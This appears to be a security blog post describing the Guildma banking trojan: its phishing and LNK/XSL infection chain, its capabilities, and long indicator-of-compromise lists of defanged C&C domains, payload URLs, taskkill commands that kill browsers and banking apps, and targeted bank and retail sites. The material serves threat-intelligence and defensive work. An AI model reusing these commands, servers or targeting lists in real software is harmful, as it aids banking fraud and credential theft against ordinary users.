Guildma Remote Access Trojan

Guildma is a modular remote access trojan targeting financial and governmental organisations. First observed in 2015 in campaigns primarily targeting South America, Guildma began to see use in a range of global campaigns starting in May 2019.

The campaign spreads via phishing emails posing as invoices, tax reports, invitations and similar types of messages containing a ZIP archive attachment with a malicious LNK file. When a user opens the malicious LNK file, it abuses the Windows Management Instrumentation Command-line tool and silently downloads a malicious XSL file. The XSL file downloads all of Guildma’s modules and executes a first stage loader, which loads the rest of the modules. The malware is then active and waits for commands from the C&C server and/or specific user interactions, such as opening a webpage of one of the targeted banks.

Once installed, Guildma will collect user and system information to send back to a command and control server, before awaiting further commands. By default, it has the ability to monitor email and messaging applications, record audio and video, steal account credentials, and install secondary payloads. Guildma will also monitor user browser activity and attempt to phish their information whenever they visit banking related websites.

The phishing emails used to spread Guildma are mainly sent through rented or purchased websites, or using hacked websites, by installing or copying malicious PHP code, with mass mailing functions, to the website code. The malware authors usually use a custom PHP shell, based on a simple mail function with a specific header. 

Indicators of Compromise

A.1 Server list 1

hxxp://megatronico.xn--6frz82g/09/dsct.txt?vx=0137
hxxp://xn--80aaalggjw6a2a.site/09/dsct.txt?vx=0137
hxxp://xn--lckko7eri8b.pw/09/dsct.txt?vx=0137
hxxp://megatronico.club/09/dsct.txt?vx=0137
hxxp://megatronico.fun/09/dsct.txt?vx=0137
hxxp://megatronico.pw/09/dsct.txt?vx=0137
hxxp://megatronico.site/09/dsct.txt?vx=0137
hxxp://megatronico.xyz/09/dsct.txt?vx=0137
hxxp://newswtc106.com/09/dsct.txt?vx=0137
hxxp://magmonsterx1.xyz/09/dsct.txt?vx=0137
hxxp://sisssnetttx1.com/09/dsct.txt?vx=0137
hxxp://magmonsterx2.xyz/09/dsct.txt?vx=0137
hxxp://sisssnetttx2.com/09/dsct.txt?vx=0137
hxxp://magmonsterx3.xyz/09/dsct.txt?vx=0137
hxxp://sisssnetttx4.com/09/dsct.txt?vx=0137
hxxp://sisssnetttx5.com/09/dsct.txt?vx=0137
hxxp://sisssnetttx77.thaieasydns.com/09/dsct.txt?vx=0137
hxxp://sisssnetttx88.compress.to/09/dsct.txt?vx=0137
hxxp://sisssnetttx6.info/09/dsct.txt?vx=0137
hxxp://sisssnetttx6.net/09/dsct.txt?vx=0137
hxxp://sisssnetttx6.net.br/09/dsct.txt?vx=0137
hxxp://sisssnetttx6.in/09/dsct.txt?vx=0137
hxxp://sisssnetttx6.website/09/dsct.txt?vx=0137
hxxp://sisssnetttx0xix0.com/09/dsct.txt?vx=0137

A.2 Server list 2

hxxp://storage.googleapis.com/tx141radx137/9/dados.txt
hxxp://storage.googleapis.com/carbon-syntax-605.appspot.com/137/9/dados.txt
hxxp://tx141radx137.xyz//9/dados.txt
hxxp://storage.googleapis.com/1tx141radx137/9/dados.txt
hxxp://storage.googleapis.com/2tx141radx137/9/dados.txt
hxxp://storage.googleapis.com/3tx141radx137/9/dados.txt
hxxp://storage.googleapis.com/4tx141radx137/9/dados.txt
hxxp://storage.googleapis.com/5tx141radx137/9/dados.txt
hxxp://storage.googleapis.com/6tx141radx137/9/dados.txt
hxxp://storage.googleapis.com/7tx141radx137/9/dados.txt
hxxp://storage.googleapis.com/8tx141radx137/9/dados.txt
hxxp://storage.googleapis.com/9tx141radx137/9/dados.txt

A.3 TaskKill

taskkill /f /im iexplore.exe
taskkill /f /im firefox.exe
taskkill /f /im chrome.exe
taskkill /f /im opera.exe
taskkill /f /im safari.exe
taskkill /f /im MicrosoftEdge.exe
taskkill /f /im AplicativoBradesco.exe
taskkill /f /im itauaplicativo.exe
taskkill /f /im java.exe
taskkill /f /im javaw.exe

A.4 File paths

C:\Program Files\Internet Explorer\iexplorer.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Program Files (x86)\Mozilla Firefox\firefox.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files\Diebold\Warsaw\core.exe
C:\Program Files\Diebold\Warsaw\mw.dbd
C:\Program Files\Diebold\Warsaw\gas.dbd
C:\Program Files\Diebold\Warsaw\gas.hisc
C:\Program Files\Diebold\Warsaw\local.data
C:\Program Files (x86)\Diebold\Warsaw\core.exe
C:\Program Files\Diebold\Warsaw\unins000.exe
C:\Program Files (x86)\Diebold\Warsaw\unins000.exe
C:\Program Files\Banco do Brasil\Assinatura Digital\bb-smartcards.exe
C:\Program Files (x86)\Banco do Brasil\Assinatura Digital\bb-smartcards.exe
C:\Program Files\AVAST Software\Avast\aswRunDll.exe
C:\Program Files (x86)\AVAST Software\Avast\aswRunDll.exe
C:\Program Files\AppBrad\AplicativoBradesco.exe
C:\Program Files (x86)\AppBrad\AplicativoBradesco.exe
C:\Users\%username$\AppData\Local\Aplicativo Itau\itauaplicativo.exe
C:\Sicoobnet\office.exe
C:\Windows\System32\regsvr32.exe
\raptor\rakpat0rpcackg.gif
\raptor\rakpat0rpcack64.~
\raptor\rakpat0rpcack98.~
\raptor\rakpat0rpcackgx.gif
\raptor\rakpat0rpcackxb.~

A.5 Version 139: targeted online bank services

Argentina:

bancodecomercio.com[.]ar
bancoprovincia
santanderrio.com[.]ar
bancogalicia[.]com
bbvafrances.com[.]ar
macro.com[.]ar
hsbc.com[.]ar
bancocredicoop[.]coop
bancopatagonia[.]com
privatebank.citibank[.]com
hipotecario.com[.]ar
bancor.com[.]ar
supervielle.com[.]ar
bancosantafe.com[.]ar
bancosanjuan[.]com
itau.com[.]ar
comafi.com[.]ar
bancodelapampa.com[.]ar
bse.com[.]ar
bancoentrerios.com[.]ar
bancochubut.com[.]ar
bancotucuman.com[.]ar
bancodecorrientes.com[.]ar
nbch.com[.]ar
bice.com[.]ar
bpn.com[.]ar
bancoformosa.com[.]ar
bancocolumbia.com[.]ar
bancopiano.com[.]ar
bancosantacruz[.]com
bancocmf.com[.]ar
mariva.com[.]ar
bst.com[.]ar
bancosaenz.com[.]ar
bancobic[.]ao
redlink.com[.]ar

Colombia:

colpatria[.]com
davivienda[.]com
grupobancolombia[.]com
bancopopular.com[.]co
bancodeoccidente.com[.]co
bancodebogota[.]com
bancocorpbanca.com[.]co
bancocajasocial[.]com
avvillas.com[.]co

Chile:

bancoestado[.]cl
bancochile[.]cl
login.bancochile[.]cl
bancocredichile[.]cl
santander[.]cl
banco.itau[.]cl
bci[.]cl
bice[.]cl
bancofalabella[.]cl
bancoedwards[.]cl
bancoripley[.]cl
corpbanca[.]cl
rbsbank[.]cl
bancosecurity[.]cl
bancopenta[.]cl
bancoparis[.]cl

Peru:

bancomercio.com[.]pe
corpebank2.icbc.com[.]cn
viabcp[.]com
banbif.com[.]pe
pichincha[.]pe
bbvacontinental[.]pe
interbank[.]pe
mibanco.com[.]pe
scotiabank.com[.]pe
bancognb.com[.]pe
bancofalabella[.]pe
bancoripley.com[.]pe
santander.com[.]pe
bancoazteca.com[.]pe
momentosbancocencosud[.]pe
visanet.com[.]pe

Ecuador:

pichincha[.]com
bancoguayaquil[.]com
bolivariano[.]com
bancomachala[.]com
bancodeloja.fin[.]ec
bcmanabi[.]com
banco-solidario[.]com
bancodelpacifico[.]com
bancopromerica[.]ec
bancodelaustro[.]com
bancoamazonas[.]com
unibanco[.]ec
bgr.com[.]ec
latam.citibank[.]com
bancocapital[.]com
bancointernacional.com[.]ec
bancofinca[.]com
produbanco[.]com
procreditecuador[.]com
coopnacional[.]com
cofiec.fin[.]ec

Uruguay:

bbva.com[.]uy
bps.gub[.]uy
brou.com[.]uy
santander.com[.]uy
itau.com[.]uy

China:

cncbinternational[.]com
citibank.com[.]cn
hsbc.com[.]cn
icbc.com[.]cn
boc[.]cn

Europe:

itau[.]eu
bbva[.]com
jpmorgan
bnpparibas
spdb.com[.]cn
bportugal[.]pt
santandertotta[.]pt
bancobpi[.]pt
deutschebank
bankinter[.]pt
barclays
millenniumbcp[.]pt
credit-suisse[.]com
privatbank[.]ua
bancobpi[.]pt
novobanco[.]pt
popularbank[.]com
bancopopular

B. Module F

B.1 1-level C&Cs

analiticsx001x[.]xyz
maisgoldww[.]xxxy[.]info
analiticsx002x[.]xyz
ghethetgdsx01[.]gettrials[.]com
wertwert918[.]xxxy[.]info
zdfgwtwertahok2[.]info
analiticsx003[.]com
ewrtrtoldww[.]xxxy[.]info
analiticsx004[.]xyz
analiticsx005[.]info
analiticsx006[.]com
analiticsx007[.]net
analiticsx008[.]website
analiticsx009[.]online
analiticsx0010[.]com
<number>danaliticsx00220a[.]com (up to 30analiticsx00220a[.]com)

C. XSL

C.1 Server list

02/2019 v137

cavaleira1[.]website
cavaleira2[.]pw
cavaleira3[.]space
cavaleira4[.]fun
cavaleira5[.]site
cavaleira6[.]xyz
davidguetta01[.]website
davidguetta02[.]pw
davidguetta03[.]space
davidguetta04[.]fun
davidguetta05[.]site
davidguetta06[.]xyz

03/2019 v137

budweiser01[.]website
budweiser02[.]pw
budweiser03[.]space
budweiser04[.]fun
budweiser05[.]site
budweiser06[.]xyz
chromiunxede[.]pw
chromiunxewaa[.]website
chromiunxjdkhy[.]fun
chromiunxjst[.]site
chromiunxkla[.]space
chromiunxkla[.]work
chromiunxma[.]xyz
chromiunxvr[.]club

04/2019 v138

americanterrier01[.]website
americanterrier02[.]pw
americanterrier03[.]space
americanterrier04[.]fun
americanterrier05[.]site
americanterrier06[.]xyz
residentevil01[.]website
residentevil02[.]pw
residentevil03[.]space
residentevil04[.]fun
residentevil05[.]site
residentevil06[.]xyz
shaokahn01[.]website
shaokahn02[.]pw
shaokahn03[.]space
shaokahn04[.]fun
shaokahn05[.]site
shaokahn06[.]xyz

04/2019 v139

hxxps://raw.githubusercontent[.]com/winsvrx/x/master/

05/2019 v139

hxxps://storage.googleapis[.]com/ultramaker/

06/2019 v140

hxxps://storage.googleapis[.]com/bradok/

C.2 Downloaded file names

<version_specific_string>(a|b|c|dwwn|dx|e|f|g|gx|xa|xb|98|hh).(jpg|gif|dll|~)

D. Module C

D.1 Server list

aventadorx7[.]com
aventadorx9[.]com
aventadorxkw1[.]net
aventadorxkw2[.]net
aventadorxkw3[.]net
dynamic6666[.]com
magmonsterx1[.]xyz
magmonsterx2[.]xyz
magmonsterx3[.]xyz
newswtc106[.]com
sisssnetttx1[.]com
sisssnetttx2[.]com
sisssnetttx3[.]com
sisssnetttx4[.]com
sisssnetttx5[.]com
sisssnetttx6[.]in
sisssnetttx6[.]info
sisssnetttx6[.]net
sisssnetttx6[.]net.br
sisssnetttx6[.]website
sisssnetttx77.thaieasydns[.]com
sisssnetttx88.compress[.]to
valhalax0xix0[.]com
valhalaxtz1[.]info
valhalaxtz2[.]pw
valhalaxtz3[.]website
valhalaxtz4[.]xyz
valhalaxtzx77.thaieasydns[.]com

D.2 Targeted web email services

mail.live[.]com
outlook.live[.]com
login.live[.]com
email.uol[.]com.br
mail.uol[.]com.br
mail.yahoo[.]com
login.yahoo[.]com
mail.google[.]com
accounts.google[.]com
mail.terra[.]com.br

Patterns of interest

:2095
/webmail
/admin

D.3 Targeted social sites/media:

facebook[.]com
twitter[.]com
Instagram[.]com
netflix[.]com

D.4 Targeted payment services:

paypal[.]com
pagseguro.uol[.]com.br
serasaexperian[.]com.br
sitenet.serasa[.]com.br
servicos.spc[.]org.br

D.5 Targeted e-commerce/e-shops:

aliexpress[.]com
amazon[.]com
ebay[.]com
ricardoeletro[.]com
walmart[.]com
magazineluiza[.]com
americanas[.]com.br
efacil[.]com.br
clubedoricardo[.]com.br
connectparts[.]com.br
passarela[.]com.br
shoptime[.]com.br
kanui[.]com.br
ebit[.]com.br
compracerta[.]com.br
panvel[.]com
groupon[.]com.br
boticario[.]com.br
pontofrio[.]com.br
centauro[.]com.br
peixeurbano[.]com.br
lojasrenner[.]com.br
store.sony[.]com.br
comprafacil[.]com.br
maxmilhas[.]com.br
zattini[.]com.br
passarela[.]com.br
avon[.]com.br
decolar[.]com
colombo[.]com.br
mercadopago[.]com
mercadolivre[.]com
extra[.]com.br
ultrafarma[.]com.br
kabum[.]com.br
netshoes[.]com.br
passarela[.]com.br
paquetaesportes[.]com.br
buscape[.]com.br
chillibeans[.]com.br
connectparts[.]com.br
casasbahia[.]com.br
dafiti[.]com.br

D.6 Miscellaneous targeted urls:

uolhost[.]com
painelhost.uol[.]com.br
locaweb[.]com.br
grupobci[.]com.br
bvsnet[.]com.br
servicos.spc.org.br
voeazul[.]com.br
voegol[.]com.br
tam[.]com.br
submarino[.]com.br
godaddy[.]com
gmx[.]com
ig[.]com.br
ogin.r7[.]com
 

E. Module DWWN

E.1 Server list

Megatronico[.]xn--6frz82g  (IDN address megatronico[.]移动)
Xn--80aaalggjw6a2a[.]site  (IDN address казагранде[.]site)
Xn--lckko7eri8b[.]pw       (IDN address カサグランデ[.]pw)
megatronico[.]club
megatronico[.]fun
megatronico[.]pw
megatronico[.]site
megatronico[.]xyz
newswtc106[.]com
magmonsterx1[.]xyz
sisssnetttx1[.]com
magmonsterx2[.]xyz
sisssnetttx2[.]com
magmonsterx3[.]xyz
sisssnetttx4[.]com
sisssnetttx5[.]com
sisssnetttx77[.]thaieasydns[.]com
sisssnetttx88[.]compress[.]to
sisssnetttx6[.]info
sisssnetttx6[.]net
sisssnetttx6[.]net[.]br
sisssnetttx6[.]in
sisssnetttx6[.]website
sisssnetttx0xix0[.]com
[41..50]sisssnetttx0xix0[.]com

Jason Davies

UK based technology professional, with an interest in computer security and telecoms.

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

%d bloggers like this: